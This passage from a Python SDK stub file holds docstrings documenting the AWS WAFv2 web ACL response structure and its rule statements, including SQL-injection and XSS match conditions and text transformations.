Name (string) --
The name of the rule to exclude.
RuleGroupReferenceStatement (dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
A rule statement used to run the rules that are defined in a RuleGroup . To use this, create a rule group with your rules, then provide the ARN of the rule group in this statement.
You cannot nest a RuleGroupReferenceStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.
ARN (string) --
The Amazon Resource Name (ARN) of the entity.
ExcludedRules (list) --
The names of rules that are in the referenced rule group, but that you want AWS WAF to exclude from processing for this rule statement.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Specifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.
Name (string) --
The name of the rule to exclude.
OverrideAction (dict) --
The override action to apply to the rules in a rule group. Used only for rule statements that reference a rule group, like RuleGroupReferenceStatement and ManagedRuleGroupStatement .
Set the override action to none to leave the rule actions in effect. Set it to count to only count matches, regardless of the rule action settings.
In a Rule , you must specify either this OverrideAction setting or the rule Action setting, but not both:
If the rule statement references a rule group, use this override action setting and not the action setting.
If the rule statement does not reference a rule group, use the rule action setting and not this rule override action setting.
Count (dict) --
Override the rule action setting to count.
None (dict) --
Don\'t override the rule action setting.
VisibilityConfig (dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Defines and enables Amazon CloudWatch metrics and web request sample collection.
SampledRequestsEnabled (boolean) --
A boolean indicating whether AWS WAF should store a sampling of the web requests that match the rules. You can view the sampled requests through the AWS WAF console.
CloudWatchMetricsEnabled (boolean) --
A boolean indicating whether the associated resource sends metrics to CloudWatch. For the list of available metrics, see AWS WAF Metrics .
MetricName (string) --
A name of the CloudWatch metric. The name can contain only alphanumeric characters (A-Z, a-z, 0-9), with length from one to 128 characters. It can\'t contain whitespace or metric names reserved for AWS WAF, for example "All" and "Default_Action." You can\'t change a MetricName after you create a VisibilityConfig .
ManagedByFirewallManager (boolean) --
Indicates whether this web ACL is managed by AWS Firewall Manager. If true, then only AWS Firewall Manager can delete the web ACL or any Firewall Manager rule groups in the web ACL.
LockToken (string) --
A token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'WebACL': {
'Name': 'string',
'Id': 'string',
'ARN': 'string',
'DefaultAction': {
'Block': {},
'Allow': {}
},
'Description': 'string',
'Rules': [
{
'Name': 'string',
'Priority': 123,
'Statement': {
'ByteMatchStatement': {
'SearchString': b'bytes',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
],
'PositionalConstraint': 'EXACTLY'|'STARTS_WITH'|'ENDS_WITH'|'CONTAINS'|'CONTAINS_WORD'
},
'SqliMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'XssMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'SizeConstraintStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'ComparisonOperator': 'EQ'|'NE'|'LE'|'LT'|'GE'|'GT',
'Size': 123,
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'GeoMatchStatement': {
'CountryCodes': [
'AF'|'AX'|'AL'|'DZ'|'AS'|'AD'|'AO'|'AI'|'AQ'|'AG'|'AR'|'AM'|'AW'|'AU'|'AT'|'AZ'|'BS'|'BH'|'BD'|'BB'|'BY'|'BE'|'BZ'|'BJ'|'BM'|'BT'|'BO'|'BQ'|'BA'|'BW'|'BV'|'BR'|'IO'|'BN'|'BG'|'BF'|'BI'|'KH'|'CM'|'CA'|'CV'|'KY'|'CF'|'TD'|'CL'|'CN'|'CX'|'CC'|'CO'|'KM'|'CG'|'CD'|'CK'|'CR'|'CI'|'HR'|'CU'|'CW'|'CY'|'CZ'|'DK'|'DJ'|'DM'|'DO'|'EC'|'EG'|'SV'|'GQ'|'ER'|'EE'|'ET'|'FK'|'FO'|'FJ'|'FI'|'FR'|'GF'|'PF'|'TF'|'GA'|'GM'|'GE'|'DE'|'GH'|'GI'|'GR'|'GL'|'GD'|'GP'|'GU'|'GT'|'GG'|'GN'|'GW'|'GY'|'HT'|'HM'|'VA'|'HN'|'HK'|'HU'|'IS'|'IN'|'ID'|'IR'|'IQ'|'IE'|'IM'|'IL'|'IT'|'JM'|'JP'|'JE'|'JO'|'KZ'|'KE'|'KI'|'KP'|'KR'|'KW'|'KG'|'LA'|'LV'|'LB'|'LS'|'LR'|'LY'|'LI'|'LT'|'LU'|'MO'|'MK'|'MG'|'MW'|'MY'|'MV'|'ML'|'MT'|'MH'|'MQ'|'MR'|'MU'|'YT'|'MX'|'FM'|'MD'|'MC'|'MN'|'ME'|'MS'|'MA'|'MZ'|'MM'|'NA'|'NR'|'NP'|'NL'|'NC'|'NZ'|'NI'|'NE'|'NG'|'NU'|'NF'|'MP'|'NO'|'OM'|'PK'|'PW'|'PS'|'PA'|'PG'|'PY'|'PE'|'PH'|'PN'|'PL'|'PT'|'PR'|'QA'|'RE'|'RO'|'RU'|'RW'|'BL'|'SH'|'KN'|'LC'|'MF'|'PM'|'VC'|'WS'|'SM'|'ST'|'SA'|'SN'|'RS'|'SC'|'SL'|'SG'|'SX'|'SK'|'SI'|'SB'|'SO'|'ZA'|'GS'|'SS'|'ES'|'LK'|'SD'|'SR'|'SJ'|'SZ'|'SE'|'CH'|'SY'|'TW'|'TJ'|'TZ'|'TH'|'TL'|'TG'|'TK'|'TO'|'TT'|'TN'|'TR'|'TM'|'TC'|'TV'|'UG'|'UA'|'AE'|'GB'|'US'|'UM'|'UY'|'UZ'|'VU'|'VE'|'VN'|'VG'|'VI'|'WF'|'EH'|'YE'|'ZM'|'ZW',
]
},
'RuleGroupReferenceStatement': {
'ARN': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
},
'IPSetReferenceStatement': {
'ARN': 'string'
},
'RegexPatternSetReferenceStatement': {
'ARN': 'string',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'RateBasedStatement': {
'Limit': 123,
'AggregateKeyType': 'IP',
'ScopeDownStatement': {'... recursive ...'}
},
'AndStatement': {
'Statements': [
{'... recursive ...'},
]
},
'OrStatement': {
'Statements': [
{'... recursive ...'},
]
},
'NotStatement': {
'Statement': {'... recursive ...'}
},
'ManagedRuleGroupStatement': {
'VendorName': 'string',
'Name': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
}
},
'Action': {
'Block': {},
'Allow': {},
'Count': {}
},
'OverrideAction': {
'Count': {},
'None': {}
},
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
}
},
],
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
},
'Capacity': 123,
'PreProcessFirewallManagerRuleGroups': [
{
'Name': 'string',
'Priority': 123,
'FirewallManagerStatement': {
'ManagedRuleGroupStatement': {
'VendorName': 'string',
'Name': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
},
'RuleGroupReferenceStatement': {
'ARN': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
}
},
'OverrideAction': {
'Count': {},
'None': {}
},
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
}
},
],
'PostProcessFirewallManagerRuleGroups': [
{
'Name': 'string',
'Priority': 123,
'FirewallManagerStatement': {
'ManagedRuleGroupStatement': {
'VendorName': 'string',
'Name': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
},
'RuleGroupReferenceStatement': {
'ARN': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
}
},
'OverrideAction': {
'Count': {},
'None': {}
},
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
}
},
],
'ManagedByFirewallManager': True|False
},
'LockToken': 'string'
}
:returns:
Method : The HTTP method that you want AWS WAF to search for. This indicates the type of operation specified in the request.
UriPath : The value that you want AWS WAF to search for in the URI path, for example, /images/daily-ad.jpg .
"""
pass
def get_web_acl_for_resource(ResourceArn=None):
"""
Retrieves the WebACL for the specified resource.
See also: AWS API Documentation
Exceptions
:example: response = client.get_web_acl_for_resource(
ResourceArn='string'
)
:type ResourceArn: string
:param ResourceArn: [REQUIRED]\nThe ARN (Amazon Resource Name) of the resource.\n
:rtype: dict
ReturnsResponse Syntax{
'WebACL': {
'Name': 'string',
'Id': 'string',
'ARN': 'string',
'DefaultAction': {
'Block': {},
'Allow': {}
},
'Description': 'string',
'Rules': [
{
'Name': 'string',
'Priority': 123,
'Statement': {
'ByteMatchStatement': {
'SearchString': b'bytes',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
],
'PositionalConstraint': 'EXACTLY'|'STARTS_WITH'|'ENDS_WITH'|'CONTAINS'|'CONTAINS_WORD'
},
'SqliMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'XssMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'SizeConstraintStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'ComparisonOperator': 'EQ'|'NE'|'LE'|'LT'|'GE'|'GT',
'Size': 123,
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'GeoMatchStatement': {
'CountryCodes': [
'AF'|'AX'|'AL'|'DZ'|'AS'|'AD'|'AO'|'AI'|'AQ'|'AG'|'AR'|'AM'|'AW'|'AU'|'AT'|'AZ'|'BS'|'BH'|'BD'|'BB'|'BY'|'BE'|'BZ'|'BJ'|'BM'|'BT'|'BO'|'BQ'|'BA'|'BW'|'BV'|'BR'|'IO'|'BN'|'BG'|'BF'|'BI'|'KH'|'CM'|'CA'|'CV'|'KY'|'CF'|'TD'|'CL'|'CN'|'CX'|'CC'|'CO'|'KM'|'CG'|'CD'|'CK'|'CR'|'CI'|'HR'|'CU'|'CW'|'CY'|'CZ'|'DK'|'DJ'|'DM'|'DO'|'EC'|'EG'|'SV'|'GQ'|'ER'|'EE'|'ET'|'FK'|'FO'|'FJ'|'FI'|'FR'|'GF'|'PF'|'TF'|'GA'|'GM'|'GE'|'DE'|'GH'|'GI'|'GR'|'GL'|'GD'|'GP'|'GU'|'GT'|'GG'|'GN'|'GW'|'GY'|'HT'|'HM'|'VA'|'HN'|'HK'|'HU'|'IS'|'IN'|'ID'|'IR'|'IQ'|'IE'|'IM'|'IL'|'IT'|'JM'|'JP'|'JE'|'JO'|'KZ'|'KE'|'KI'|'KP'|'KR'|'KW'|'KG'|'LA'|'LV'|'LB'|'LS'|'LR'|'LY'|'LI'|'LT'|'LU'|'MO'|'MK'|'MG'|'MW'|'MY'|'MV'|'ML'|'MT'|'MH'|'MQ'|'MR'|'MU'|'YT'|'MX'|'FM'|'MD'|'MC'|'MN'|'ME'|'MS'|'MA'|'MZ'|'MM'|'NA'|'NR'|'NP'|'NL'|'NC'|'NZ'|'NI'|'NE'|'NG'|'NU'|'NF'|'MP'|'NO'|'OM'|'PK'|'PW'|'PS'|'PA'|'PG'|'PY'|'PE'|'PH'|'PN'|'PL'|'PT'|'PR'|'QA'|'RE'|'RO'|'RU'|'RW'|'BL'|'SH'|'KN'|'LC'|'MF'|'PM'|'VC'|'WS'|'SM'|'ST'|'SA'|'SN'|'RS'|'SC'|'SL'|'SG'|'SX'|'SK'|'SI'|'SB'|'SO'|'ZA'|'GS'|'SS'|'ES'|'LK'|'SD'|'SR'|'SJ'|'SZ'|'SE'|'CH'|'SY'|'TW'|'TJ'|'TZ'|'TH'|'TL'|'TG'|'TK'|'TO'|'TT'|'TN'|'TR'|'TM'|'TC'|'TV'|'UG'|'UA'|'AE'|'GB'|'US'|'UM'|'UY'|'UZ'|'VU'|'VE'|'VN'|'VG'|'VI'|'WF'|'EH'|'YE'|'ZM'|'ZW',
]
},
'RuleGroupReferenceStatement': {
'ARN': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
},
'IPSetReferenceStatement': {
'ARN': 'string'
},
'RegexPatternSetReferenceStatement': {
'ARN': 'string',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'RateBasedStatement': {
'Limit': 123,
'AggregateKeyType': 'IP',
'ScopeDownStatement': {'... recursive ...'}
},
'AndStatement': {
'Statements': [
{'... recursive ...'},
]
},
'OrStatement': {
'Statements': [
{'... recursive ...'},
]
},
'NotStatement': {
'Statement': {'... recursive ...'}
},
'ManagedRuleGroupStatement': {
'VendorName': 'string',
'Name': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
}
},
'Action': {
'Block': {},
'Allow': {},
'Count': {}
},
'OverrideAction': {
'Count': {},
'None': {}
},
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
}
},
],
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
},
'Capacity': 123,
'PreProcessFirewallManagerRuleGroups': [
{
'Name': 'string',
'Priority': 123,
'FirewallManagerStatement': {
'ManagedRuleGroupStatement': {
'VendorName': 'string',
'Name': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
},
'RuleGroupReferenceStatement': {
'ARN': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
}
},
'OverrideAction': {
'Count': {},
'None': {}
},
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
}
},
],
'PostProcessFirewallManagerRuleGroups': [
{
'Name': 'string',
'Priority': 123,
'FirewallManagerStatement': {
'ManagedRuleGroupStatement': {
'VendorName': 'string',
'Name': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
},
'RuleGroupReferenceStatement': {
'ARN': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
}
},
'OverrideAction': {
'Count': {},
'None': {}
},
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
}
},
],
'ManagedByFirewallManager': True|False
}
}
Response Structure
(dict) --
WebACL (dict) --The Web ACL that is associated with the resource. If there is no associated resource, AWS WAF returns a null Web ACL.
Name (string) --The name of the Web ACL. You cannot change the name of a Web ACL after you create it.
Id (string) --A unique identifier for the WebACL . This ID is returned in the responses to create and list commands. You use this ID to do things like get, update, and delete a WebACL .
ARN (string) --The Amazon Resource Name (ARN) of the Web ACL that you want to associate with the resource.
DefaultAction (dict) --The action to perform if none of the Rules contained in the WebACL match.
Block (dict) --Specifies that AWS WAF should block requests by default.
Allow (dict) --Specifies that AWS WAF should allow requests by default.
Description (string) --A description of the Web ACL that helps with identification. You cannot change the description of a Web ACL after you create it.
Rules (list) --The Rule statements used to identify the web requests that you want to allow, block, or count. Each rule includes one top-level statement that AWS WAF uses to identify matching web requests, and parameters that govern how AWS WAF handles them.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
A single rule, which you can use in a WebACL or RuleGroup to identify web requests that you want to allow, block, or count. Each rule includes one top-level Statement that AWS WAF uses to identify matching web requests, and parameters that govern how AWS WAF handles them.
Name (string) --The name of the rule. You can\'t change the name of a Rule after you create it.
Priority (integer) --If you define more than one Rule in a WebACL , AWS WAF evaluates each request against the Rules in order based on the value of Priority . AWS WAF processes rules with lower priority first. The priorities don\'t need to be consecutive, but they must all be different.
Statement (dict) --The AWS WAF processing statement for the rule, for example ByteMatchStatement or SizeConstraintStatement .
ByteMatchStatement (dict) --A rule statement that defines a string match search for AWS WAF to apply to web requests. The byte match statement provides the bytes to search for, the location in requests that you want AWS WAF to search, and other settings. The bytes to search for are typically a string that corresponds with ASCII characters. In the AWS WAF console and the developer guide, this is refered to as a string match statement.
SearchString (bytes) --A string value that you want AWS WAF to search for. AWS WAF searches only in the part of web requests that you designate for inspection in FieldToMatch . The maximum length of the value is 50 bytes.
Valid values depend on the component that you specify for inspection in FieldToMatch :
Method : The HTTP method that you want AWS WAF to search for. This indicates the type of operation specified in the request.
UriPath : The value that you want AWS WAF to search for in the URI path, for example, /images/daily-ad.jpg .
If SearchString includes alphabetic characters A-Z and a-z, note that the value is case sensitive.
If you\'re using the AWS WAF API
Specify a base64-encoded version of the value. The maximum length of the value before you base64-encode it is 50 bytes.
For example, suppose the value of Type is HEADER and the value of Data is User-Agent . If you want to search the User-Agent header for the value BadBot , you base64-encode BadBot using MIME base64-encoding and include the resulting value, QmFkQm90 , in the value of SearchString .
If you\'re using the AWS CLI or one of the AWS SDKs
The value that you want AWS WAF to search for. The SDK automatically base64 encodes the value.
FieldToMatch (dict) --The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .
SingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.
Name (string) --The name of the query header to inspect.
SingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.
This is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.
Name (string) --The name of the query argument to inspect.
AllQueryArguments (dict) --Inspect all query arguments.
UriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .
QueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.
Body (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.
Note that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.
Method (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.
TextTransformations (list) --Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.
Priority (integer) --Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.
Type (string) --You can specify the following transformation types:
CMD_LINE
When you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:
Delete the following characters: " \' ^
Delete spaces before the following characters: / (
Replace the following characters with a space: , ;
Replace multiple spaces with one space
Convert uppercase letters (A-Z) to lowercase (a-z)
COMPRESS_WHITE_SPACE
Use this option to replace the following characters with a space character (decimal 32):
f, formfeed, decimal 12
t, tab, decimal 9
n, newline, decimal 10
r, carriage return, decimal 13
v, vertical tab, decimal 11
non-breaking space, decimal 160
COMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE
Use this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:
Replaces (ampersand)quot; with "
Replaces (ampersand)nbsp; with a non-breaking space, decimal 160
Replaces (ampersand)lt; with a "less than" symbol
Replaces (ampersand)gt; with >
Replaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters
Replaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters
LOWERCASE
Use this option to convert uppercase letters (A-Z) to lowercase (a-z).
URL_DECODE
Use this option to decode a URL-encoded value.
NONE
Specify NONE if you don\'t want any text transformations.
PositionalConstraint (string) --The area within the portion of a web request that you want AWS WAF to search for SearchString . Valid values include the following:
CONTAINS
The specified part of the web request must include the value of SearchString , but the location doesn\'t matter.
CONTAINS_WORD
The specified part of the web request must include the value of SearchString , and SearchString must contain only alphanumeric characters or underscore (A-Z, a-z, 0-9, or _). In addition, SearchString must be a word, which means that both of the following are true:
SearchString is at the beginning of the specified part of the web request or is preceded by a character other than an alphanumeric character or underscore (_). Examples include the value of a header and ;BadBot .
SearchString is at the end of the specified part of the web request or is followed by a character other than an alphanumeric character or underscore (_), for example, BadBot; and -BadBot; .
EXACTLY
The value of the specified part of the web request must exactly match the value of SearchString .
STARTS_WITH
The value of SearchString must appear at the beginning of the specified part of the web request.
ENDS_WITH
The value of SearchString must appear at the end of the specified part of the web request.
SqliMatchStatement (dict) --Attackers sometimes insert malicious SQL code into web requests in an effort to extract data from your database. To allow or block web requests that appear to contain malicious SQL code, create one or more SQL injection match conditions. An SQL injection match condition identifies the part of web requests, such as the URI or the query string, that you want AWS WAF to inspect. Later in the process, when you create a web ACL, you specify whether to allow or block requests that appear to contain malicious SQL code.
FieldToMatch (dict) --The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .
SingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.
Name (string) --The name of the query header to inspect.
SingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.
This is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.
Name (string) --The name of the query argument to inspect.
AllQueryArguments (dict) --Inspect all query arguments.
UriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .
QueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.
Body (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.
Note that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.
Method (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.
TextTransformations (list) --Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.
Priority (integer) --Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.
Type (string) --You can specify the following transformation types:
CMD_LINE
When you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:
Delete the following characters: " \' ^
Delete spaces before the following characters: / (
Replace the following characters with a space: , ;
Replace multiple spaces with one space
Convert uppercase letters (A-Z) to lowercase (a-z)
COMPRESS_WHITE_SPACE
Use this option to replace the following characters with a space character (decimal 32):
f, formfeed, decimal 12
t, tab, decimal 9
n, newline, decimal 10
r, carriage return, decimal 13
v, vertical tab, decimal 11
non-breaking space, decimal 160
COMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE
Use this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:
Replaces (ampersand)quot; with "
Replaces (ampersand)nbsp; with a non-breaking space, decimal 160
Replaces (ampersand)lt; with a "less than" symbol
Replaces (ampersand)gt; with >
Replaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters
Replaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters
LOWERCASE
Use this option to convert uppercase letters (A-Z) to lowercase (a-z).
URL_DECODE
Use this option to decode a URL-encoded value.
NONE
Specify NONE if you don\'t want any text transformations.
XssMatchStatement (dict) --A rule statement that defines a cross-site scripting (XSS) match search for AWS WAF to apply to web requests. XSS attacks are those where the attacker uses vulnerabilities in a benign website as a vehicle to inject malicious client-site scripts into other legitimate web browsers. The XSS match statement provides the location in requests that you want AWS WAF to search and text transformations to use on the search area before AWS WAF searches for character sequences that are likely to be malicious strings.
FieldToMatch (dict) --The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .
SingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.
Name (string) --The name of the query header to inspect.
SingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.
This is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.
Name (string) --The name of the query argument to inspect.
AllQueryArguments (dict) --Inspect all query arguments.
UriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .
QueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.
Body (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.
